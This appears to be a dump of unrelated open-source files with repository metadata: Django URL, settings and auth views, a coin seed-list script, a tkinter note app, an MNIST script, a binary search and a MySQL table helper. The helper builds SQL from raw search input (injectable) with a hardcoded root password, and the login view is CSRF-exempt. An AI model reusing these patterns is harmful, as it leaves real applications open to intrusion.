2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include, url
from django.contrib import admin
from rest_framework import routers
from photos import views
router = routers.DefaultRouter()
router.register(r'users', views.UserViewSet)
router.register(r'groups', views.GroupViewSet)
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^photos/', include('photos.urls')),
url(r'^api/classify', views.ClassifyView.as_view(), name='classify'),
url(r'^api/', include(router.urls)),
url(r'^api-auth/', include(
'rest_framework.urls', namespace='rest_framework'))
]
|
[
"jjinking@gmail.com"
] |
jjinking@gmail.com
|
d16f06029e76bb7cb24d6b3bec2cb8c0b487984e
|
296fcdd19a03c7a38cbc926dc286c06425fe1920
|
/contrib/seeds/makeseeds.py
|
d0de83fbe35cb7872da17f731c30b6f83323d005
|
[
"MIT"
] |
permissive
|
givehopecoin/GiveHopeCore
|
fe7a094e74954c427d86c1b878b5d838e827080c
|
fa90c3f13a27e1a83658dbde8bc1ef5f33b5f2be
|
refs/heads/master
| 2020-04-02T02:47:17.014891
| 2019-03-23T14:38:38
| 2019-03-23T14:38:38
| 153,927,829
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,514
|
py
|
#!/usr/bin/env python3
# Copyright (c) 2013-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Generate seeds.txt from Pieter's DNS seeder
#
NSEEDS=512
MAX_SEEDS_PER_ASN=2
MIN_BLOCKS = 615801
# These are hosts that have been observed to be behaving strangely (e.g.
# aggressively connecting to every node).
SUSPICIOUS_HOSTS = {
""
}
import re
import sys
import dns.resolver
import collections
PATTERN_IPV4 = re.compile(r"^((\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})):(\d+)$")
PATTERN_IPV6 = re.compile(r"^\[([0-9a-z:]+)\]:(\d+)$")
PATTERN_ONION = re.compile(r"^([abcdefghijklmnopqrstuvwxyz234567]{16}\.onion):(\d+)$")
PATTERN_AGENT = re.compile(r"^(/HOPCCore:2.2.(0|1|99)/)$")
def parseline(line):
sline = line.split()
if len(sline) < 11:
return None
m = PATTERN_IPV4.match(sline[0])
sortkey = None
ip = None
if m is None:
m = PATTERN_IPV6.match(sline[0])
if m is None:
m = PATTERN_ONION.match(sline[0])
if m is None:
return None
else:
net = 'onion'
ipstr = sortkey = m.group(1)
port = int(m.group(2))
else:
net = 'ipv6'
if m.group(1) in ['::']: # Not interested in localhost
return None
ipstr = m.group(1)
sortkey = ipstr # XXX parse IPv6 into number, could use name_to_ipv6 from generate-seeds
port = int(m.group(2))
else:
# Do IPv4 sanity check
ip = 0
for i in range(0,4):
if int(m.group(i+2)) < 0 or int(m.group(i+2)) > 255:
return None
ip = ip + (int(m.group(i+2)) << (8*(3-i)))
if ip == 0:
return None
net = 'ipv4'
sortkey = ip
ipstr = m.group(1)
port = int(m.group(6))
# Skip bad results.
if sline[1] == 0:
return None
# Extract uptime %.
uptime30 = float(sline[7][:-1])
# Extract Unix timestamp of last success.
lastsuccess = int(sline[2])
# Extract protocol version.
version = int(sline[10])
# Extract user agent.
if len(sline) > 11:
agent = sline[11][1:] + sline[12][:-1]
else:
agent = sline[11][1:-1]
# Extract service flags.
service = int(sline[9], 16)
# Extract blocks.
blocks = int(sline[8])
# Construct result.
return {
'net': net,
'ip': ipstr,
'port': port,
'ipnum': ip,
'uptime': uptime30,
'lastsuccess': lastsuccess,
'version': version,
'agent': agent,
'service': service,
'blocks': blocks,
'sortkey': sortkey,
}
def filtermultiport(ips):
'''Filter out hosts with more nodes per IP'''
hist = collections.defaultdict(list)
for ip in ips:
hist[ip['sortkey']].append(ip)
return [value[0] for (key,value) in list(hist.items()) if len(value)==1]
# Based on Greg Maxwell's seed_filter.py
def filterbyasn(ips, max_per_asn, max_total):
# Sift out ips by type
ips_ipv4 = [ip for ip in ips if ip['net'] == 'ipv4']
ips_ipv6 = [ip for ip in ips if ip['net'] == 'ipv6']
ips_onion = [ip for ip in ips if ip['net'] == 'onion']
# Filter IPv4 by ASN
result = []
asn_count = {}
for ip in ips_ipv4:
if len(result) == max_total:
break
try:
asn = int([x.to_text() for x in dns.resolver.query('.'.join(reversed(ip['ip'].split('.'))) + '.origin.asn.cymru.com', 'TXT').response.answer][0].split('\"')[1].split(' ')[0])
if asn not in asn_count:
asn_count[asn] = 0
if asn_count[asn] == max_per_asn:
continue
asn_count[asn] += 1
result.append(ip)
except:
sys.stderr.write('ERR: Could not resolve ASN for "' + ip['ip'] + '"\n')
# TODO: filter IPv6 by ASN
# Add back non-IPv4
result.extend(ips_ipv6)
result.extend(ips_onion)
return result
def main():
lines = sys.stdin.readlines()
ips = [parseline(line) for line in lines]
# Skip entries with valid address.
ips = [ip for ip in ips if ip is not None]
# Skip entries from suspicious hosts.
ips = [ip for ip in ips if ip['ip'] not in SUSPICIOUS_HOSTS]
# Enforce minimal number of blocks.
ips = [ip for ip in ips if ip['blocks'] >= MIN_BLOCKS]
# Require service bit 1.
ips = [ip for ip in ips if (ip['service'] & 1) == 1]
# Require at least 50% 30-day uptime.
ips = [ip for ip in ips if ip['uptime'] > 50]
# Require a known and recent user agent.
ips = [ip for ip in ips if PATTERN_AGENT.match(re.sub(' ', '-', ip['agent']))]
# Sort by availability (and use last success as tie breaker)
ips.sort(key=lambda x: (x['uptime'], x['lastsuccess'], x['ip']), reverse=True)
# Filter out hosts with multiple bitcoin ports, these are likely abusive
ips = filtermultiport(ips)
# Look up ASNs and limit results, both per ASN and globally.
ips = filterbyasn(ips, MAX_SEEDS_PER_ASN, NSEEDS)
# Sort the results by IP address (for deterministic output).
ips.sort(key=lambda x: (x['net'], x['sortkey']))
for ip in ips:
if ip['net'] == 'ipv6':
print('[%s]:%i' % (ip['ip'], ip['port']))
else:
print('%s:%i' % (ip['ip'], ip['port']))
if __name__ == '__main__':
main()
|
[
"pavhash@core.givehope.com"
] |
pavhash@core.givehope.com
|
83d000605b618a2e8dbfda1c65f277e62005961e
|
334f85db42a24710dcabd715d00087b90988fbe1
|
/Class 6/Virtual Post it.py
|
01665fa3960feec953a5b69c06b95476130a33dd
|
[
"MIT"
] |
permissive
|
GRCosta/vgp245
|
c92fc04150f4abdf4513755b29cfe448b5cc00c0
|
4b5e727a597d884d9bd7ae4a41f5f35e8c0de459
|
refs/heads/master
| 2020-03-30T22:15:49.929001
| 2018-12-14T04:52:41
| 2018-12-14T04:52:41
| 151,660,505
| 1
| 0
|
MIT
| 2018-10-05T02:16:01
| 2018-10-05T02:16:01
| null |
UTF-8
|
Python
| false
| false
| 2,141
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Nov 14 12:36:01 2018
@author: grcosta
"""
import tkinter
import tkinter.scrolledtext as scroll
import tkinter.messagebox as messagebox
import tkinter.filedialog as filedialog
from tkinter import END
import datetime
root = tkinter.Tk(className="#Virtual Post-it")
notePad = scroll.ScrolledText(root, width=80, height=40, background="light yellow")
frame = tkinter.Frame(root)
frame.pack(side=tkinter.TOP)
# Function definitions
def comm_open_file():
file = filedialog.askopenfile(parent = root, mode = 'rb', title = 'Select a file')
if file != None:
contents = file.read()
notePad.insert('1.0', contents)
file.close()
def comm_save_file():
file = filedialog.asksaveasfile(mode='w', initialfile='Post it .txt', defaultextension=".txt", filetypes=[("All Files","*.*"), ("Text Documents","*.txt")])
if file != None:
data = notePad.get('1.0', END + '-1c')
file.write(data)
file.close()
def comm_quit():
if tkinter.messagebox.askokcancel("Quit", "Do you really want to quit?"):
root.destroy()
def comm_about():
label = messagebox.showinfo("About", "Virtual Post-it \n Copyright @grcosta")
def comm_time_stamp():
timestamp = datetime.datetime.now().strftime('%d %B %Y %H:%M:%S - \n')
notePad.insert(tkinter.INSERT, "\n")
notePad.insert(tkinter.INSERT, timestamp)
# For the menus
menu = tkinter.Menu(root)
root.config(menu = menu)
# 1. File menu
fileMenu = tkinter.Menu(menu)
menu.add_cascade(label = "File", menu = fileMenu)
fileMenu.add_command(label = "New")
fileMenu.add_command(label = "Open...", command = comm_open_file)
fileMenu.add_command(label = "Save", command = comm_save_file)
fileMenu.add_separator()
fileMenu.add_command(label = "Exit", command = comm_quit)
helpMenu = tkinter.Menu(menu)
menu.add_cascade(label = "Help", menu = helpMenu)
helpMenu.add_command(label = "About...", command = comm_about)
bTimeStamp = tkinter.Button(frame, text = 'TimeStamp', fg = 'blue', width = 20, command = comm_time_stamp)
bTimeStamp.pack(side=tkinter.RIGHT)
notePad.pack()
root.mainloop()
|
[
"gr.costa@gmail.com"
] |
gr.costa@gmail.com
|
e36e51123dfd3b00410807e81503fefeaed8eb57
|
e36416c7ee3ae44ac8df45ba0c34fc10b7913bee
|
/getJson.py
|
faac71db8ab9afa4e2664e974d2765838a490d3d
|
[] |
no_license
|
LockeyCheng/economist
|
69f19964843b700748294ce83635717158a98acd
|
7fc9427e0a46e156013ab1248e4a1c98080033e6
|
refs/heads/master
| 2020-03-10T12:53:01.591547
| 2019-05-12T07:58:22
| 2019-05-12T07:58:22
| 129,387,174
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 205
|
py
|
import json
def getJson():
with open('./result/explanation.json') as fo:
data = json.load(fo)
return data
if __name__ == '__main__':
data = getJson()
print(data['household'])
|
[
"iooiooi23@163.com"
] |
iooiooi23@163.com
|
2bb8cf74872671a4a9d6fc670751fb70b3e2ba7b
|
972cefd4d6c8079be70fefdf291718388c903a47
|
/authentication/views.py
|
64f95e5df461f6ac5b4ce9fc82caebdea048f27c
|
[] |
no_license
|
zaplon/shop
|
fe9abd46fac270ed985202bc42b8c9a6e6c20924
|
edfb2f683aa0aba37c80d3c99ede5384312d8669
|
refs/heads/master
| 2021-01-01T15:19:12.264275
| 2015-11-01T13:45:10
| 2015-11-01T13:45:10
| 27,991,698
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,540
|
py
|
import json
from django.shortcuts import redirect
from django.views.generic import CreateView
from django.contrib.auth import authenticate, login, logout
from .admin import UserCreationForm
from authentication.models import User
from django.views.decorators.csrf import csrf_exempt
from django.contrib.auth.views import password_reset, password_reset_done
from django.shortcuts import HttpResponse, HttpResponseRedirect,render, render_to_response, RequestContext
@csrf_exempt
class RegistrationView(CreateView):
form_class = UserCreationForm
model = User
def form_valid(self, form):
obj = form.save(commit=False)
obj.set_password(User.objects.make_random_password())
obj.save()
return redirect('accounts:register-password')
def form_invalid(self, form):
if 'source' in form.data and form.data['source'] == 'checkout':
return render_to_response('checkout.djhtml', {'creationForm': form,
'products_in_cart': True, 'step':1}, context_instance=RequestContext(self.request))
@csrf_exempt
def register(request):
if request.method == 'POST':
form = UserCreationForm(request.POST)
if form.is_valid():
new_user = form.save()
user = authenticate(username=request.POST['email'], password=request.POST['password1'])
if user.is_active:
login(request, user)
if 'source' in request.POST:
return HttpResponseRedirect("/" + request.POST['source'] + "/")
#return render_to_response('registration_complete.html', {}, context_instance=RequestContext(request) )
else:
return render_to_response('registration_complete.html', {}, context_instance=RequestContext(request) )
else:
form = UserCreationForm()
if 'source' in request.POST and request.POST['source'] == 'checkout':
return render_to_response('checkout.djhtml', {'creationForm': form,
'products_in_cart': True, 'step':1},
context_instance=RequestContext(request))
else:
return render(request, "registerView.html", {
'form': form,
})
@csrf_exempt
def loginView(request):
user = authenticate(email=request.POST['email'], password=request.POST['password'])
if user is not None:
# the password verified for the user
if user.is_active:
login(request, user)
if 'source' in request.POST:
return HttpResponseRedirect(request.POST['source'])
else:
return HttpResponse(json.dumps({'success': True}))
else:
if 'source' in request.POST:
return HttpResponseRedirect(request.POST['source'])
else:
return HttpResponse(json.dumps({'success': False,
'message': "The password is valid, but the account has been disabled!"}))
else:
# the authentication system was unable to verify the username and password
return HttpResponse(json.dumps({'success': False, 'message': "The username and password were incorrect."}))
def logoutView(request):
logout(request)
url = request.META['HTTP_REFERER'].split('/')[-1]
return HttpResponseRedirect('/' + url)
def password_reset_view(request):
password_reset(request)
def password_reset_done_view(request):
password_reset_done(request)
|
[
"janek.zapal@gmail.com"
] |
janek.zapal@gmail.com
|
ff685150be501c205b1a25081fb6692c47358299
|
2a86db4e93cfb66a10242438c41660b6555cc8f6
|
/Day10/college/college/settings.py
|
f59a76f3a4f1bb5da72ccae53585e8be043aff5d
|
[] |
no_license
|
Srinivasareddymediboina/Djano-Batch4
|
97c8b5c192c82c155bd8c95d1b1bff58b1b372aa
|
9a8a3df4001ff4cc4c7e31aac194e99c87670482
|
refs/heads/master
| 2023-01-31T11:54:01.186971
| 2020-12-18T06:00:18
| 2020-12-18T06:00:18
| 284,895,371
| 5
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,106
|
py
|
"""
Django settings for college project.
Generated by 'django-admin startproject' using Django 3.0.8.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '*d$&w9#jkq_xg4ac40o(qt!5-_h%+rzw_cl=@kg_4^=j6u5b(r'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'student',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'college.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'college.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
|
[
"sireeshareyyi@gmail.com"
] |
sireeshareyyi@gmail.com
|
8952daabad114969d0e758dd5d4c67265ace80e8
|
1f01150c7036f41f697406a75481c4b3c5590264
|
/L0/fw.py
|
87a78bea5ac7fc8db2e323b8a62154c9410316d1
|
[] |
no_license
|
xidactw/LM
|
1dc6fdeff30e80bd81244f92008a54cbaaa52d91
|
0980a349be4c6428991b91451487d9e2d07804c5
|
refs/heads/master
| 2021-03-16T05:35:19.633824
| 2017-05-31T08:08:28
| 2017-05-31T08:08:28
| 91,556,504
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 806
|
py
|
# -*- coding:utf-8 -*-
# /usr/bin/python
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
import math
def func(a):
if a < 1e-6:
return 0
last = a
c = a / 2
while math.fabs(c - last) > 1e-6:
last = c
c = (c + a/c) / 2
return c
if __name__ == '__main__':
# mpl.rcParams['font.sans-serif'] = [u'SimHei']
mpl.rcParams['axes.unicode_minus'] = False
x = np.linspace(0, 30, num=50)
func_ = np.frompyfunc(func, 1, 1)
y = func_(x)
# y = np.sqrt(x)
plt.figure(figsize=(10, 5), facecolor='w')
plt.plot(x, y, 'ro-', lw=2, markersize=6)
plt.grid(b=True, ls=':')
plt.xlabel(u'X', fontsize=16)
plt.ylabel(u'Y', fontsize=16)
plt.title(u'่ฟๆฎตไปฃ็ ๅจ่ฎก็ฎไปไน๏ผ', fontsize=18)
plt.show()
|
[
"zhangdi214@126.com"
] |
zhangdi214@126.com
|
d907442a9099c3f6ce5d5d7bbfa9cb87cb008925
|
d9e016cd6030dd33738334b6676e67ffd8f30a03
|
/Experiments/Ex1_3.py
|
d80ca7275d1692320dde3619b29e5a1345a55d99
|
[] |
no_license
|
daaaisuke/ControlMeditation_EEG
|
288d0e3b67045e429c982cd3d373547ab0788742
|
f992e71d3d46b2f80522412c0a749d341222e1d8
|
refs/heads/master
| 2020-11-25T11:54:25.099041
| 2019-12-17T15:38:44
| 2019-12-17T15:38:44
| 228,645,218
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,433
|
py
|
# coding: UTF-8
import signal
import sys
import pygame
import pygame.midi
import time
import pygame.pypm
#Ctrl-Cใงๆใใๆ็จใฎ้ขๆฐ
def handler(signal, frame):
player.close()
pygame.quit()
sys.exit(0)
print("Ex1_3.py")
pygame.midi.init()
player = pygame.midi.Output(1, latency = 1)
#Ctrl-Cใงๆใใใใจใๆค็ฅใใใใชใฌใผ
signal.signal(signal.SIGINT, handler)
#.txt่ชญใฟๅใ
f = open('./midi/Ex1_Jazz.txt')
lines = f.readlines()
f.close()
time_stamp = 0
Ftime_stamp = 0
for i in range(len(lines)):
lines[i] = lines[i].rstrip('\n').split(",")
EndTrigger = True
Stime = time.time()
while EndTrigger:
for notes in lines:
time_stamp += long(notes[-1])
Ftime_stamp += long(notes[-1])
if Ftime_stamp >= 5000:
time.sleep(5)
Ftime_stamp = 0
#note_on event
if notes[0] == 'non':
if int(notes[3]) > 63:
notes[3] = int(notes[3]) - int(int(notes[3])/5)
if notes[3] < 63:
notes[3] = 63
else:
notes[3] = int(notes[3]) + int(int(notes[3])/5)
if notes[3] > 63:
notes[3] = 63
player.write([[[0x90 + int(notes[1]),int(notes[2]),int(notes[3])],time_stamp]]) #ไฟกๅทในใใผใฟใน,ใใใ,ใใญใทใใฃ,ใฟใคใ ในใฟใณใ
#note_off event
elif notes[0] == 'nof':
player.write([[[0x90 + int(notes[1]),int(notes[2]),0],time_stamp]])
#control_change event
if notes[0] == 'cc':
player.write([[[0xb0 + int(notes[1]),int(notes[2]),int(notes[3])],time_stamp]])
#sysex event
elif notes[0] == 'sy':
data = list(map(int,notes[1:-1]))
data.insert(0,240)
data.append(247)
player.write_sys_ex(time_stamp,data)
#program_change event
elif notes[0] == 'pc':
player.write([[[0xc0 + int(notes[1]),int(notes[2])],time_stamp]])
#meta_message event
#elif notes[0] == 'mt':
#time_signature meta_message
#if notes[1] == 'ts':
#player.write([[[0xFF, 0x58, 0x04,int(notes[2]),int(notes[3]),int(notes[4]),int(notes[5])], int(notes[6])]])
#player.write_sys_ex(time_stamp,[240,255, 88, 4, 4, 4, 18,8,247])
#key_signature meta_message
#elif notes[1] == 'ks':
#player.write([[[0xFF, 0x59, 0x02, int(notes[2]),int(notes[3])],int(notes[4])]])
#set_tempo meta_message
#elif notes[1] == 'st':
#tempo_hex = hex(int(notes[2]))
#if len(tempo_hex) == 7:
#tempo_hex = list(tempo_hex)
#tempo_hex.insert(2, '0')
#tempo_hex = "".join(tempo_hex)
#tempo_hexs = [0,0,0]
#tempo_hexs[0] = tempo_hex[2:4]
#tempo_hexs[1] = tempo_hex[4:6]
#tempo_hexs[2] = tempo_hex[6:8]
#player.write([[[0xFF, 0x51, 0x03, int(tempo_hexs[0]),int(tempo_hexs[1]),int(tempo_hexs[2])], int(notes[3])]])
#end_of_track meta_message
#elif notes[1] == 'eot':
#print('finish midi message')
if time.time() - Stime > 60:
EndTrigger = False
break
player.close()
pygame.quit()
|
[
"daaaisuke15176266@gmail.com"
] |
daaaisuke15176266@gmail.com
|
d4ff15d238cee16bddae1bf5d6acc597802e025c
|
a592f54ea1da7f9c512ff178f93635f48fb6bf4c
|
/main.py
|
24fe251f7e0f66e466fc21d38099690376f839f9
|
[] |
no_license
|
mildbyte/console-massacre
|
a7719f2fad4ce921ffdc046c819f1332d2f334a7
|
9fd41cdbf88fe75469c73bf79be267832c48b55c
|
refs/heads/master
| 2021-01-01T06:49:33.348826
| 2012-09-26T10:47:22
| 2012-09-26T10:47:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,165
|
py
|
"""Main unit, includes CharGen functions and entry point with loop"""
import World
import Item
import os.path
import sys
import pickle
import os
import Character
import UI
import BattleField
import Shop
def save():
"""Saves user character progress, returns 0 on success, -1 on failure"""
global Player
FileName = UI.xInput("Enter filename to save to (default: player.dat): ", "player.dat")
FileName = "".join(("saves/", FileName))
try:
if os.path.exists(FileName):
if input("Warning! File already exists. Type \'yes\' if you want to continue: ") != "yes":
return 0
Out = open(FileName, "wb")
pickle.dump(Player, Out)
Out.close()
except Exception:
print ("Error: " + sys.exc_info()[0])
UI.waitForKey()
return -1
print("Complete")
UI.waitForKey()
return 0
def load():
global Player
global Arena
FileName = UI.xInput("Enter filename to load from (default: player.dat): ", "player.dat")
FileName = "".join(("saves/", FileName))
try:
if not os.path.exists(FileName):
print("File doesn't exist!")
UI.waitForKey()
return -1
Out = open(FileName, "rb")
Player = pickle.load(Out)
Out.close()
# Resolve player's items to pointers
# TODO: Use ID's to do it, save IDs to file
for InvItem in Player.Inventory:
for MasterItem in Item.ItemList:
if InvItem.Base.Name == MasterItem.Name:
InvItem.Base = MasterItem
for InvItem in Player.Inventory:
if not InvItem.Equipped: break
Player.Equipment[InvItem.Base.Type] = InvItem
Arena.Opponent1 = Player
except Exception:
print ("Error: " + sys.exc_info()[0])
UI.waitForKey()
return -1
print("Complete")
UI.waitForKey()
return 0
def charGen():
"""Player character generation with dialogue to replace an existing character"""
global Player
if Player.Exists and Player.Health != 0:
choice = input ("Doing this will delete your current character, are you sure(yes)?")
if (choice.strip() != "yes"): return
Player.__init__()
Player.IsPlayer = 1
Player.generate()
while not CharGenMenu.Returned:
CharGenMenu.doMenu()
if CharGenMenu.Returned:
CharGenMenu.Returned = 0
break
def charGenEnterName():
"""Small function to enter character name"""
global Player
NewName = input("Enter Character Name: ")
Player.Name = NewName.strip ()
#Easter Egg
if Player.Name == "God":
Player.Experience = 900
Player.STR = 19
Player.DEX = 19
Player.CON = 19
Player.MaxHealth = 1000
Player.Health = 1000
Player.calcModifiers()
Player.Gold = 10000
def charGenRollForStats ():
"""Roll for player stats and display them"""
global Player
Player.generate()
Player.showInfo()
Player = Character.CharClass()
Arena = BattleField.BattleFieldClass(Player)
NewWorld = World.WorldClass()
NewCell1 = World.CellClass()
NewCell2 = World.CellClass()
ToCell1 = World.CellExitClass()
ToCell1.Name = "To Cell 1"
ToCell1.Cell = NewCell1
ToCell2 = World.CellExitClass()
ToCell2.Name = "To Cell 2"
ToCell2.Cell = NewCell2
NewCell1.Name = "Cell 1"
NewCell1.Exits = [ToCell2]
NewCell2.Name = "Cell 2"
NewCell2.Exits = [ToCell1]
NewCell1.Chars.append(Player)
NewWorld.Cells = [NewCell1, NewCell2]
NewCell1.Items.append(Item.TestPotion)
TestMonster = Character.CharClass()
TestMonster.Name = "Rat"
TestMonster.generate()
TestMonster1 = Character.CharClass()
TestMonster1.Name = "Angry Rat"
TestMonster1.generate()
NewCell2.Chars += [TestMonster, TestMonster1]
#Main Menu
MainMenu = UI.MenuClass()
MainMenu.Title = "Console Massacre"
MainMenu.HasReturn = 0
#Character Generation Menu
CharGenMenu = UI.MenuClass()
CharGenMenu.Title = "Create Character"
CharGenMenu.addItem("Enter Name", charGenEnterName, "N")
CharGenMenu.addItem("Roll for Stats", charGenRollForStats, "S", 1)
CharGenMenu.addItem("View Stats", lambda: Player.showInfo(), "V", 1)
while 1:
#Main game loop which just outputs menu, further choices are handled by menu logic
MainMenu.clear()
MainMenu.addItem("Create Character", charGen, "c")
if Player.Exists and Player.Health > 0:
MainMenu.addItem("Shop", lambda: Shop.Shop.doShop(Player), "s")
MainMenu.addItem("Battle!", lambda: Arena.battle(), "b")
MainMenu.addItem("Add Test Potion", lambda: Player.addItem(Item.TestPotion))
MainMenu.addItem("Add Money", lambda: Player.addGold(10000))
MainMenu.addItem("Teleport", lambda: NewWorld.doWorld(Player))
MainMenu.addItem("Save", save, "v")
MainMenu.addItem("Load", load, "l")
MainMenu.addItem("Quit", exit, "q")
MainMenu.doMenu()
|
[
"mildbyte@gmail.com"
] |
mildbyte@gmail.com
|
b52b80c1ef9bad3a706f6fbba47094d387f72eb7
|
2d46ba87b2fcd835b07e4608f08a38b476a87aef
|
/mnist.py
|
e4d77aa81190e7da6e2dc89309885a615ef34c16
|
[] |
no_license
|
VariSingh/deepMNIST_tflearn
|
f4c63600e0c3a59321c82f0f4454a2df9850e292
|
b1eaf6dd9db3de65d506a2164e9ba97662c43848
|
refs/heads/master
| 2020-03-26T05:15:14.629662
| 2018-08-18T16:18:41
| 2018-08-18T16:18:41
| 144,546,532
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 749
|
py
|
import tflearn
#load data
import tflearn.datasets.mnist as mnist
X, Y, testX, testY = mnist.load_data(one_hot=True)
#neural network
input = tflearn.input_data(shape=[None,784])
input = tflearn.fully_connected(input,100,activation='relu')
layer1 = tflearn.fully_connected(input,100,activation='relu')
layer2 = tflearn.fully_connected(layer1,100,activation='relu')
output = tflearn.fully_connected(layer2,10,activation='softmax')
sgd = tflearn.SGD(learning_rate=0.1)
top_k = tflearn.metrics.Top_k(3)
net = tflearn.regression(output, optimizer=sgd, metric=top_k, loss='categorical_crossentropy')
#training
model = tflearn.DNN(net,tensorboard_verbose=0)
model.fit(X,Y, n_epoch=20, validation_set=(testX,testY),show_metric=True, run_id="dense_model")
|
[
"varindersingh271990@gmail.com"
] |
varindersingh271990@gmail.com
|
d798cd3985b8664d72e9f49e1424f34a35fa588f
|
d5241877326f9aa3e65f5d9f0a89184d24e94929
|
/binSearch.py
|
a855cdc772ca708b2f909f0125bacc5e94d832ff
|
[] |
no_license
|
Anthony-dominianni/Algorithms
|
4ad9b54ffbcd9ff168c79030221faa05b5b59bfb
|
7f4bbe2321a1bbbccdd5b6ac78f2d51f340098f6
|
refs/heads/master
| 2020-04-20T12:56:36.668817
| 2019-02-13T15:48:49
| 2019-02-13T15:48:49
| 168,855,438
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 398
|
py
|
import math
# Return the index of n in a sorted list L
def binSearch(L, n):
if len(L) == 0:
return 0
hi = len(L) - 1
lo = 0
while lo <= hi:
mid = math.floor((hi + lo) / 2)
if L[mid] == n:
return mid
elif L[mid] > n:
hi = mid
else:
lo = mid
return None
L = [1, 2, 3, 4, 5, 8, 9, 10, 24, 56, 67, 89, 102, 345, 677, 2345, 23457, 23758]
num = binSearch(L, 10)
print(num)
|
[
"anthony.dominianni@gmail.com"
] |
anthony.dominianni@gmail.com
|
b737c76be0be41b139dfb866ea3859363c252a67
|
eb92413b4e4b6e36b43d7f0d2c4fe754a5267144
|
/api/lib/data_tables.py
|
5cb6fb4ce2fb507e6947f56ed3e96c72620529e1
|
[] |
no_license
|
asmtechnologiesltd/Ruckus-Monitoring
|
ce9445e1702e2eeb81b4bcd7d4b7aa033b837096
|
d6426b0ca57415a4f3239c2f09311b3d73318cf3
|
refs/heads/master
| 2021-03-27T10:25:47.263446
| 2015-09-30T14:40:00
| 2015-09-30T14:40:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,076
|
py
|
### This is data table library for generic function for all tables with search and paginations
### This will respond the jsons fot table for the given page number and number of rows with search query
### Date Created: Sep 24th, 2015
### Originated By Hariharaselvam Balasubramanian (4470)
from mysqlclass import MysqlPython
import json
from bson import json_util
def big_table(**params):
conn = MysqlPython('localhost', 'root', 'mysql123', 'SCG');
page = params['page']
limit= params['limit']
tablename= params['tablename']
columns= params['columns']
where_condition= params['where_condition']
search= params['search']
page = page-1;
start= limit*page;
where_clause=" where ";
#print search
for key in search:
where_clause=where_clause+key+" like '%%"+search[key]+"%%' and ";
where_clause=where_clause+where_condition;
count_sql="select count(*) from "+tablename;
full_count_sql=count_sql+" where "+where_condition;
#print full_count_sql;
acdata = conn.select_advanced(full_count_sql);
acount = acdata[0];
filter_count_sql=count_sql+where_clause;
#print filter_count_sql;
fcdata = conn.select_advanced(filter_count_sql);
fcount = fcdata[0];
if fcount < start:
start=0;
#print columns;
data_sql="select "+",".join(columns)+" from "+tablename+where_clause+" limit "+str(start)+","+str(limit);
print "\n"+data_sql+"\n"
result=[];
data = conn.select_advanced(data_sql);
for row in data:
#print row;
result.append(dict(zip(columns, row)));
json_data={'count':acount, 'items':result, 'filter_count':fcount };
#print "\n\n"
#returns the data as json
return json.dumps(json_data, default=json_util.default)
def test():
